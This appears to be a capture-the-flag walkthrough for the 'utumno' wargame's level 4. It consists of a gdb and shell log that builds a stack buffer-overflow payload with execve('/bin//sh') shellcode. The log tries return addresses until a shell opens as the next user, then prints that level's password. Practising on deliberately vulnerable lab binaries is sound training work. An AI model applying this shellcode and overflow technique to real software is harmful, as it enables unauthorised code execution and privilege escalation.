utumno - 4
2016-04-13 14:43
root@today:~/Desktop/misc/utumno/utumno4# ssh utumno4@178.79.134.250
utumno4@melinda:~$ cd /tmp/utu4
utumno4@melinda:/tmp/utu4$ gdb -tui /utumno/utumno4
(gdb) layout asm
(gdb) b *main+108
Breakpoint 1 at 0x80484c9: file utumno4.c, line 36.
(gdb) run 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'`
Starting program: /games/utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'`
Breakpoint 1, main (argc=1431655765, argv=0x55555555) at utumno4.c:36
(gdb) x/8dbx $esp+0x1e
0xfffdd6ce: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f
# So the buffer address is 0xfffdd6de or 0xfffdd6be.
utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xce\xd6\xfd\xff" + "U" * 238'`
Segmentation fault
utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xbe\xd6\xfd\xff" + "U" * 238'`
Illegal instruction
utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xde\xd6\xfd\xff" + "U" * 238'`
$ whoami
utumno5
$ cat /etc/utumno_pass/utumno5
woucaejiek
$